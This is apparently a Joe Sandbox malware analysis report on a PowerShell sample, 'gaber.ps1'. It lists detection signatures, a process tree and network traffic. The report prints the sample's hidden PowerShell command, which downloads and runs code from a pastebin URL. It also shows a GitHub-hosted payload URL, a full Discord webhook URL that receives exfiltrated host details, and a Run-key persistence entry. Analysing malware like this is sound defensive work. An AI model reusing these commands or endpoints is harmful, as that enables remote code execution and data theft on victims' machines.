Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gaber.ps1

Overview

General Information

Sample name:gaber.ps1
Analysis ID:1534103
MD5:f177ca636ad5075efbe6887fd66cb3b2
SHA1:5713e175914d3fed4ea6735bde9d11573174cf38
SHA256:b7dc686342b33eb4004a97e560c60d1f924dd513773ef39cc26fc797e7caf22b
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6936 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 8120 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8184 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6504 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6920 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7612INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x19dd26:$b1: ::WriteAllBytes(
  • 0x246b70:$b1: ::WriteAllBytes(
  • 0xc3da:$s1: -join
  • 0x194af:$s1: -join
  • 0x1c881:$s1: -join
  • 0x1cf33:$s1: -join
  • 0x1ea24:$s1: -join
  • 0x20c2a:$s1: -join
  • 0x21451:$s1: -join
  • 0x21cc1:$s1: -join
  • 0x223fc:$s1: -join
  • 0x2242e:$s1: -join
  • 0x22476:$s1: -join
  • 0x22495:$s1: -join
  • 0x22ce5:$s1: -join
  • 0x22e61:$s1: -join
  • 0x22ed9:$s1: -join
  • 0x22f6c:$s1: -join
  • 0x231d2:$s1: -join
  • 0x25368:$s1: -join
  • 0x33db2:$s1: -join
Process Memory Space: powershell.exe PID: 7412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x372a:$b1: ::WriteAllBytes(
  • 0xf5111:$b1: ::WriteAllBytes(
  • 0x148f67:$b1: ::WriteAllBytes(
  • 0x2fe76:$s1: -join
  • 0x3598e:$s1: -join
  • 0x135b3c:$s1: -join
  • 0x13629d:$s1: -join
  • 0x73c64:$s3: reverse
  • 0x7a8e6:$s3: reverse
  • 0x7c78e:$s3: reverse
  • 0x877bd:$s3: reverse
  • 0xbd36f:$s3: reverse
  • 0xbd65d:$s3: reverse
  • 0xbdd77:$s3: reverse
  • 0xbe530:$s3: reverse
  • 0xc548c:$s3: reverse
  • 0xc58a6:$s3: reverse
  • 0xc642e:$s3: reverse
  • 0xc70db:$s3: reverse
  • 0x17383c:$s3: reverse
  • 0x17f236:$s3: reverse
Process Memory Space: powershell.exe PID: 336INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xa7edc:$b1: ::WriteAllBytes(
  • 0x5e0e1:$s1: -join
  • 0x5e842:$s1: -join
  • 0xcd25d:$s1: -join
  • 0x10b2d5:$s1: -join
  • 0x184d90:$s1: -join
  • 0x422c:$s3: reverse
  • 0xae60:$s3: reverse
  • 0xcf0c:$s3: reverse
  • 0x17f3b:$s3: reverse
  • 0x350b5:$s3: reverse
  • 0x40a11:$s3: reverse
  • 0x6f9d5:$s3: reverse
  • 0x797f7:$s3: reverse
  • 0x131d88:$s3: reverse
  • 0x132076:$s3: reverse
  • 0x132790:$s3: reverse
  • 0x132f49:$s3: reverse
  • 0x13a13c:$s3: reverse
  • 0x13a556:$s3: reverse
  • 0x13b0de:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_7612.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1567:$b1: ::WriteAllBytes(
  • 0xd632:$s1: -join
  • 0x6dde:$s4: +=
  • 0x6ea0:$s4: +=
  • 0xb0c7:$s4: +=
  • 0xd1e4:$s4: +=
  • 0xd4ce:$s4: +=
  • 0xd614:$s4: +=
  • 0xf82c:$s4: +=
  • 0xf8ac:$s4: +=
  • 0xf972:$s4: +=
  • 0xf9f2:$s4: +=
  • 0xfbc8:$s4: +=
  • 0xfc4c:$s4: +=
  • 0x1601:$e4: Get-WmiObject
  • 0x16a3:$e4: Get-WmiObject
  • 0xdd15:$e4: Get-WmiObject
  • 0xdf04:$e4: Get-Process
  • 0xdf5c:$e4: Start-Process
amsi64_7412.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_336.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 8120, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 8184, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", ProcessId: 7612, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gaber.ps1", ProcessId: 7612, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:53:48.856929+020028576591A Network Trojan was detected192.168.2.749873162.159.137.232443TCP
2024-10-15T15:54:01.793594+020028576591A Network Trojan was detected192.168.2.749947162.159.137.232443TCP
2024-10-15T15:54:08.153894+020028576591A Network Trojan was detected192.168.2.749979162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.0% probability
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49873 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49900 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49947 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.7:49979 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49873 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49947 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49979 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Expect: 100-continueConnection: Keep-Alive
Source: powershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000001.00000002.1775797610.000001A9115B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1883565122.0000024D9025C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60050C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.1943997837.000001D60050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1883565122.0000024D902F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1943997837.000001D600AFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000001.00000002.1750873547.000001A901541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1781186898.000001A919940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microso.
Source: powershell.exe, 00000001.00000002.1781186898.000001A919940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microso..om
Source: powershell.exe, 00000007.00000002.1921937897.0000024DA7AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coGI
Source: powershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000001.00000002.1750873547.000001A901541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8F847000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000001.00000002.1750873547.000001A901B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D90DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6015F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000007.00000002.1883565122.0000024D90CAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D6014BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000007.00000002.1883565122.0000024D9038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000C.00000002.1943997837.000001D600BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D600A9A000.00000004.00000800.00020000.00000000.sdmp, gaber.ps1String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000001.00000002.1750873547.000001A901765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1750873547.000001A90258B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565122.0000024D8FD0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1943997837.000001D60050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1775797610.000001A9115B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1775797610.000001A9116F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
